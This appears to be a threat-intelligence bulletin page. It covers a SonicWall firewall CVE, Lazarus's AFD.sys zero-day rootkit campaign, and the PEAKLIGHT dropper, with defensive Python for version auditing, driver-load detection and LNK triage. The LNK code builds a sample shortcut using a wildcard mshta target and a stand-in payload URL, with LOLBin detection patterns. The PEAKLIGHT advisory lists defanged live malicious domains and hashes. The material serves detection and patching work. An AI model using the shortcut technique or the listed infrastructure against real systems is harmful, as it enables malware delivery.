Critical Vulnerability in SonicWall Firewalls Allows Unauthorized Access

SUMMARY

SonicWall has released patches for a critical vulnerability (CVE-2024-40766) in its firewalls. The flaw could allow unauthorized access to resources on the device and, if exploited under specific conditions, crash the firewall.

RISK SCORE

CVE-ID            CVSSv3
CVE-2024-40766    9.3

VULNERABILITY DETAILS

CVE-2024-40766 is an improper access control weakness in the SonicOS management interface. A successful exploit could give an attacker access to resources that should be restricted and, under specific conditions, cause the firewall to crash.

The CVSSv3 score of 9.3 reflects a network-based attack vector, low attack complexity, and the fact that exploitation requires neither authentication nor user interaction.

AFFECTED PRODUCTS

  • SonicWall Gen 5 firewalls (SOHO): SonicOS 5.9.2.14-12o and older
  • SonicWall Gen 6 firewalls: SonicOS 6.5.4.14-109n and older
  • SonicWall Gen 7 firewalls: SonicOS 7.0.1-5035 and older

RECOMMENDATIONS

  • Apply the latest security patches released by SonicWall:
    • SOHO (Gen 5 firewalls) – 5.9.2.14-13o
    • Gen 6 firewalls – 6.5.2.8-2n (SM9800, NSsp 12400 and NSsp 12800)
    • Gen 6 firewalls – 6.5.4.15-116n (all other Gen 6 appliances)
    • Gen 7 firewalls – any SonicOS version higher than 7.0.1-5035. SonicWall states that the vulnerability is not reproducible in firmware newer than 7.0.1-5035, but still recommends installing the latest firmware.
  • If immediate patching is not possible, restrict firewall management access to trusted sources.
  • Disable firewall WAN management access from internet-facing interfaces as an additional precaution.
  • Monitor firewall logs for unusual access attempts or unexplained crashes.
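To turn the affected-version and fixed-version lists above into a repeatable check across a fleet, the following added Python example (not SonicWall's code or tooling) parses SonicOS version strings of the form release-build[suffix], assigns each device to the firmware branch the advisory patches, and reports which devices in a constructed inventory still run an affected build. The mapping of models to the 6.5.2.x branch, the hostnames and the inventory itself are assumptions for illustration; in practice the version would be read from each appliance or from SonicWall's management platform.

```python
import re
from typing import NamedTuple


class SonicOSVersion(NamedTuple):
    release: tuple  # dotted numeric part, e.g. (6, 5, 4, 14)
    build: int      # build number after the dash, e.g. 109
    suffix: str     # trailing letters such as "n" or "o"; display only


_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)-(\d+)([a-z]*)$")


def parse_version(text: str) -> SonicOSVersion:
    """Parse strings like '6.5.4.14-109n' or '7.0.1-5035'."""
    m = _VERSION_RE.match(text.strip().lower())
    if not m:
        raise ValueError(f"unrecognised SonicOS version string: {text!r}")
    release = tuple(int(p) for p in m.group(1).split("."))
    return SonicOSVersion(release, int(m.group(2)), m.group(3))


def _key(v: SonicOSVersion):
    # Order by dotted release first, then build number; the letter suffix is ignored.
    return (v.release, v.build)


# Fixed builds named in the advisory. Gen 7 has no single fixed build: any
# SonicOS newer than 7.0.1-5035 is not affected.
FIXED_BUILD = {
    "gen5": "5.9.2.14-13o",
    "gen6-6.5.2": "6.5.2.8-2n",
    "gen6-6.5.4": "6.5.4.15-116n",
}
GEN7_LAST_VULNERABLE = "7.0.1-5035"

# Models the advisory lists for the 6.5.2.x Gen 6 branch. Assumption: model names
# are matched case-insensitively as they appear in the inventory.
GEN6_652_MODELS = {"sm9800", "nssp 12400", "nssp 12800"}


def branch_for(v: SonicOSVersion, model: str = "") -> str:
    major = v.release[0]
    if major == 5:
        return "gen5"
    if major == 6:
        # Assumption: a device already on a 6.5.2.x build belongs to that branch
        # even if its model is not in the list above.
        on_652 = model.strip().lower() in GEN6_652_MODELS or v.release[:3] == (6, 5, 2)
        return "gen6-6.5.2" if on_652 else "gen6-6.5.4"
    if major == 7:
        return "gen7"
    raise ValueError(f"SonicOS {major}.x is not covered by this advisory")


def is_vulnerable(version_text: str, model: str = "") -> bool:
    v = parse_version(version_text)
    branch = branch_for(v, model)
    if branch == "gen7":
        return _key(v) <= _key(parse_version(GEN7_LAST_VULNERABLE))
    return _key(v) < _key(parse_version(FIXED_BUILD[branch]))


def required_fix(version_text: str, model: str = "") -> str:
    branch = branch_for(parse_version(version_text), model)
    if branch == "gen7":
        return f"any SonicOS build newer than {GEN7_LAST_VULNERABLE}"
    return FIXED_BUILD[branch]


def audit(inventory):
    """inventory: iterable of (hostname, model, version). Returns (host, version, fix) per affected device."""
    return [
        (host, ver, required_fix(ver, model))
        for host, model, ver in inventory
        if is_vulnerable(ver, model)
    ]


# Constructed sample inventory for illustration; hostnames are made up.
SAMPLE_INVENTORY = [
    ("fw-branch-01", "TZ400", "6.5.4.14-109n"),
    ("fw-dc-01", "NSsp 12400", "6.5.2.8-2n"),
    ("fw-edge-01", "NSa 2700", "7.0.1-5035"),
    ("fw-soho-01", "SOHO", "5.9.2.14-13o"),
]

if __name__ == "__main__":
    for host, ver, fix in audit(SAMPLE_INVENTORY):
        print(f"{host}: {ver} is affected by CVE-2024-40766, upgrade to {fix}")
```

Versions are compared on the dotted release first and the build number second, ignoring the trailing letter, so a 6.5.2.x appliance (SM9800, NSsp 12400/12800) is judged against 6.5.2.8-2n rather than against the 6.5.4 branch; comparing such a device against 6.5.4.14-109n alone would wrongly report a patched SM9800 as vulnerable.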

 

Lazarus Group Exploits Windows Driver Zero-Day to Deploy Rootkit

SUMMARY

The Lazarus hacking group exploited a zero-day vulnerability in the Windows AFD.sys driver (CVE-2024-38193) to elevate privileges and install the FUDModule rootkit. Microsoft patched the flaw in August 2024. The rootkit evades detection by disabling Windows monitoring features. The flaw was used in a targeted campaign, potentially linked to attacks on Brazilian cryptocurrency professionals.

TECHNICAL DETAILS

The Lazarus hacking group is infamous for large-scale cyberheists against financial and cryptocurrency firms that fund North Korea’s weapons programs. In 2022 the US government linked the group to the $617 million cryptocurrency theft from Axie Infinity, and it offers a reward of up to $5 million for information on the group’s activities.

The North Korean Lazarus group leveraged the zero-day flaw in the Windows Ancillary Function Driver for WinSock (AFD.sys), tracked as CVE-2024-38193, in a variation of the Bring Your Own Vulnerable Driver (BYOVD) technique in which the vulnerable driver is one Windows already ships. The bug gave them kernel-level privileges, which they used to install the FUDModule rootkit, designed to evade detection by disabling Windows monitoring mechanisms. Because AFD.sys is a default component on every Windows system, the attack required no additional vulnerable driver that could be blocked or detected, which is what makes it particularly dangerous.

The attack was uncovered by Gen Digital researchers in June 2024 and is believed to be connected to a larger campaign in Brazil in which North Korean operators tracked as PUKCHONG (UNC4899) targeted cryptocurrency professionals. The attackers used social engineering, including fake job opportunities, to deliver a trojanized Python application that ultimately led to the installation of malware.

The AFD.sys vulnerability was one of several zero-day flaws Microsoft patched in August 2024. Lazarus has a history of exploiting similar kernel-driver vulnerabilities to install the FUDModule rootkit in earlier BYOVD attacks, including the Windows appid.sys driver (CVE-2024-21338) and Dell’s dbutil_2_3.sys driver (CVE-2021-21551).

INDICATORS OF COMPROMISE (IOCs)

Avast’s IOC repository on GitHub (avast/ioc, directory FudModule) publishes YARA rules for the FUDModule rootkit.

RECOMMENDATIONS

  • Ensure all systems are updated with the latest security patches, including the August 2024 Patch Tuesday update.
  • Implement advanced monitoring solutions to detect unusual behavior related to drivers and kernel-level activities.
  • Maintain strict control over driver installations, allowing only trusted and verified drivers.
  • Employ endpoint protection solutions that can block the execution of known vulnerable drivers.
  • Utilize application whitelisting to prevent unapproved executables, including vulnerable drivers, from running.
  • Segment networks to limit the impact of any potential breaches, reducing the attack surface available to threat actors.
  • Conduct regular security awareness training to ensure employees are aware of the latest phishing and social engineering tactics used by groups like Lazarus.
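The driver-control, vulnerable-driver-blocking and allow-listing recommendations above are usually implemented as checks on driver-load telemetry. The following added Python example (not from Gen Digital, Avast or this page) runs three BYOVD heuristics over a handful of constructed driver-load records modelled on Sysmon Event ID 6 fields (ImageLoaded, Signed, Signature, SignatureStatus): a name-based known-vulnerable list seeded with the dbutil_2_3.sys driver mentioned in the text, a signature check, and a check that the driver was loaded from a system driver directory. The record format and the sample lines are constructed for the example, and the file-name list is a stand-in for a hash-based list such as the LOLDrivers project.

```python
from pathlib import PureWindowsPath

# Driver file names the page associates with earlier Lazarus BYOVD activity.
# Assumption: a production list is hash-based (for example the LOLDrivers
# project), because an attacker can rename a file but not change its hash.
KNOWN_VULNERABLE_DRIVERS = {"dbutil_2_3.sys"}

# Directories a legitimately installed driver is expected to load from.
TRUSTED_DRIVER_DIRS = (
    PureWindowsPath(r"C:\Windows\System32\drivers"),
    PureWindowsPath(r"C:\Windows\System32\DriverStore"),
)

# Constructed driver-load records modelled on Sysmon Event ID 6 fields.
# These lines are made up for the example; they are not real telemetry.
SAMPLE_EVENTS = [
    r"UtcTime=2024-08-13 10:00:01.000|ImageLoaded=C:\Windows\System32\drivers\afd.sys|Signed=true|Signature=Microsoft Windows|SignatureStatus=Valid",
    r"UtcTime=2024-08-13 10:02:17.000|ImageLoaded=C:\Users\Public\dbutil_2_3.sys|Signed=true|Signature=Dell Inc.|SignatureStatus=Valid",
    r"UtcTime=2024-08-13 10:02:45.000|ImageLoaded=C:\Windows\Temp\svc.sys|Signed=false|Signature=|SignatureStatus=Unavailable",
]


def parse_event(line: str) -> dict:
    """Split one 'key=value|key=value' record into a dict."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def under_trusted_dir(image_path: str) -> bool:
    # PureWindowsPath compares case-insensitively, as NTFS does.
    p = PureWindowsPath(image_path)
    return any(d in p.parents for d in TRUSTED_DRIVER_DIRS)


def evaluate(event: dict) -> list:
    """Return the reasons a driver load looks like BYOVD; an empty list means no finding."""
    image = event.get("ImageLoaded", "")
    name = PureWindowsPath(image).name.lower()
    reasons = []
    if name in KNOWN_VULNERABLE_DRIVERS:
        reasons.append("known vulnerable driver loaded")
    if event.get("Signed", "").lower() != "true" or event.get("SignatureStatus") != "Valid":
        reasons.append("driver is unsigned or its signature did not validate")
    if not under_trusted_dir(image):
        reasons.append("driver loaded from outside the system driver directories")
    return reasons


def scan(lines) -> list:
    """Return (UtcTime, ImageLoaded, reasons) for every record that trips a heuristic."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        reasons = evaluate(event)
        if reasons:
            alerts.append((event.get("UtcTime"), event.get("ImageLoaded"), reasons))
    return alerts


if __name__ == "__main__":
    for when, image, reasons in scan(SAMPLE_EVENTS):
        print(f"{when}  {image}")
        for r in reasons:
            print(f"    - {r}")
```

Run stand-alone, the script prints two alerts: the dbutil_2_3.sys load (known vulnerable driver, non-standard path) and the unsigned svc.sys load. The afd.sys record passes every check, because it is a Microsoft-signed driver in its normal location; that is exactly why a zero-day in an in-box driver such as CVE-2024-38193 is not caught by driver blocklists or allow-lists, and why the patch is the only real mitigation for it.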

 

Blackswan CEO, Dr. Mike Saylor, Selected to Present at MSSP Alert Live 2024


Blackswan Cybersecurity is proud to announce that our CEO, Dr. Mike Saylor, was selected to present at MSSP Alert Live 2024 — October 14-16 in Austin, TX.

This year’s event will provide you with insights and information you can use about the most recent cybersecurity strategies, technologies and business opportunities. Plus, you’ll gain new perspectives about the following market-moving trends to help you with your business:

  • Artificial intelligence (AI), including how it has been and can be used for incident response and crisis communications.
  • Tackling the shortage of cybersecurity talent and professionals, and how to get the most out of your existing workforce.
  • Cybersecurity liability – how to protect your business if a breached customer sues.
  • Cybersecurity insurance – how the cyber insurance market is changing and what you need to know as you head into 2025.

Whether you are just getting started offering managed security services, or an established MSSP, MSSP Alert Live will deliver everything you need for your managed security services roadmap for 2025 and beyond.

PEAKLIGHT Dropper Exploits Windows Systems via Pirated Movie Downloads to Deliver Malware

SUMMARY

A newly identified dropper launches memory-resident, PowerShell-based malware on Windows systems and is distributed through pirated movie downloads. It delivers several malware families, including Lumma Stealer and CryptBot, through a multi-stage attack chain.

TECHNICAL DETAILS

Mandiant identified a memory-only PowerShell downloader, tracked as PEAKLIGHT, that delivers malware families including Lumma Stealer, Hijack Loader and CryptBot. The chain starts when a user downloads a Windows shortcut (LNK) file disguised as a pirated movie via a drive-by download.

The LNK file, delivered inside a ZIP archive, reaches out to a content delivery network (CDN) hosting an obfuscated JavaScript dropper. That dropper runs the PEAKLIGHT PowerShell script, which contacts a command-and-control (C2) server to retrieve and execute further payloads. Variants of the dropper also carry hex-encoded and Base64-encoded PowerShell payloads embedded in the script, which are unpacked on the host to deploy the malware.

Mandiant noted that this technique appears in several attack chains, with the LNK files using wildcards to trigger execution of the mshta.exe binary, discreetly running the malicious code.
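The LNK stage is the one a defender can inspect offline. The following added Python example (not Mandiant's code) builds a minimal Windows shortcut from the MS-SHLLINK header and StringData fields, parses it back, and flags the traits the text describes: a wildcard in the target path that resolves to mshta.exe without naming it, a URL in the arguments, and a file name dressed up as a video. The sample shortcut, its target path, its URL and the file names are constructed for the example and are not the campaign's real IOCs; the builder emits only the header and StringData (no IDList or LinkInfo), while the parser skips those structures if a real shortcut carries them.

```python
import re
import struct

# ShellLinkHeader constants (MS-SHLLINK 2.1): fixed 76-byte size and the shell link CLSID
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) this parser needs
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# StringData fields occur in this fixed order, each present only when its flag is set
STRING_DATA_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location"))


def build_lnk(relative_path, arguments=None, working_dir=None):
    """Build a minimal Unicode .lnk: the 76-byte header plus StringData (no IDList, no LinkInfo)."""
    flags, strings = IS_UNICODE | HAS_RELATIVE_PATH, {"relative_path": relative_path}
    if working_dir is not None:
        flags |= HAS_WORKING_DIR
        strings["working_dir"] = working_dir
    if arguments is not None:
        flags |= HAS_ARGUMENTS
        strings["arguments"] = arguments
    # HeaderSize, CLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize,
    # IconIndex, ShowCommand (1 = SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b""
    for bit, field in STRING_DATA_FIELDS:
        if flags & bit:  # CountCharacters (uint16) then UTF-16LE text, not NUL-terminated
            body += struct.pack("<H", len(strings[field])) + strings[field].encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a .lnk, skipping IDList and LinkInfo when present."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad header size or CLSID)")
    offset = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (uint16) does not count itself
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (uint32) includes itself
        offset += struct.unpack_from("<I", data, offset)[0]
    fields = {}
    for bit, name in STRING_DATA_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[offset:offset + width * count]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
        offset += width * count
    return fields


_LOLBIN_RE = re.compile(r"\b(mshta|powershell|pwsh|wscript|cscript|rundll32|regsvr32)\b", re.I)
_MEDIA_RE = re.compile(r"1080p|720p|\.mp4|\.mkv|\.avi", re.I)


def suspicious_indicators(fields, filename=""):
    """Heuristics for a PEAKLIGHT-style shortcut; an empty list means nothing matched."""
    target, args = fields.get("relative_path", ""), fields.get("arguments", "")
    reasons = []
    if any(c in target for c in "*?"):
        reasons.append("wildcard in target path (resolves to an executable such as mshta.exe without naming it)")
    if _LOLBIN_RE.search(target + " " + args):
        reasons.append("target or arguments invoke a script host or other LOLBin")
    if re.search(r"https?://", args, re.I):
        reasons.append("URL in arguments (remote payload fetch)")
    if _MEDIA_RE.search(filename):
        reasons.append("shortcut named like a video file")
    return reasons


# Constructed samples: target path, URL and file names are illustrative, not the campaign's IOCs
MALICIOUS_LNK = build_lnk(r"..\..\..\Windows\System32\*ta.exe", arguments="https://cdn.example.invalid/video.zip")
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe", working_dir=r"C:\Users\analyst")

if __name__ == "__main__":
    for blob, fname in ((MALICIOUS_LNK, "Full Video HD (1080p).lnk"), (BENIGN_LNK, "Notes.lnk")):
        fields = parse_lnk(blob)
        print(fname, "->", fields, suspicious_indicators(fields, fname) or "clean")
```

The parser reads only the StringData block, which is where a shortcut's relative target, working directory and command-line arguments live; a production triage tool would also decode the LinkTargetIDList, since a malicious shortcut can carry its target there and leave the relative path empty. The wildcard check is the one that matters for this campaign: a target such as a path ending in *ta.exe never contains the string "mshta", so a plain LOLBin keyword match alone would miss it.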

[Figure: PEAKLIGHT infection chain (Source: Mandiant)]

INDICATORS OF COMPROMISE (IOCs)

Domains:

  • relaxtionflouwerwi[.]shop
  • deprivedrinkyfaiir[.]shop
  • detailbaconroollyws[.]shop
  • messtimetabledkolvk[.]shop
  • considerrycurrentyws[.]shop
  • understanndtytonyguw[.]shop
  • patternapplauderw[.]shop
  • horsedwollfedrwos[.]shop
  • tropicalironexpressiw[.]shop

 

URLs:

  • hxxp://gceight8vt[.]top/upload.php
  • hxxps://brewdogebar[.]com/code.vue
  • hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
  • hxxps://fatodex.b-cdn[.]net/K1.zip
  • hxxps://fatodex.b-cdn[.]net/K2.zip
  • hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
  • hxxps://matodown.b-cdn[.]net/K1.zip
  • hxxps://matodown.b-cdn[.]net/K2.zip
  • hxxps://nextomax.b-cdn[.]net/L1.zip
  • hxxps://nextomax.b-cdn[.]net/L2.zip
  • hxxps://potexo.b-cdn[.]net/K1.zip
  • hxxps://potexo.b-cdn[.]net/K2.zip
  • hxxps://fatodex.b-cdn[.]net/fatodex
  • hxxps://matodown.b-cdn[.]net/matodown
  • hxxps://potexo.b-cdn[.]net/potexo

 

MD5:

CRYPTBOT:

  • erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
  • zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
  • Sеexe (MD5: d8e21ac76b228ec144217d1e85df2693)

 

LUMMAC.V2:

  • oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
  • dll (MD5: 58c4ba9385139785e9700898cb097538)

 

PEAKLIGHT:

  • Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
  • Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3)

 

SHADOWLADDER:

  • exe (MD5: b15bac961f62448c872e1dc6d3931016)
  • cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
  • doc (MD5: f98e0d9599d40ed032ff16de242987ca)
  • zip (MD5: b6b8164feca728db02e6b636162a2960)
  • zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
  • zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
  • zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
  • zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
  • dll (MD5: 059d94e8944eca4056e92d60f7044f14)
  • txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
  • dll (MD5: 47eee41b822d953c47434377006e01fe)

 

RECOMMENDATIONS

  • Do not download pirated content or software from untrusted sources.
  • Ensure that antivirus and anti-malware solutions are current and capable of detecting PowerShell-based threats.
  • Monitor for unusual activities such as the execution of mshta.exe or unexpected network connections to CDN sites.
  • Implement security measures that can detect and block obfuscated scripts and LNK file-based attacks.
  • Educate users about the risks associated with downloading files from unreliable websites, especially those offering pirated content.

 
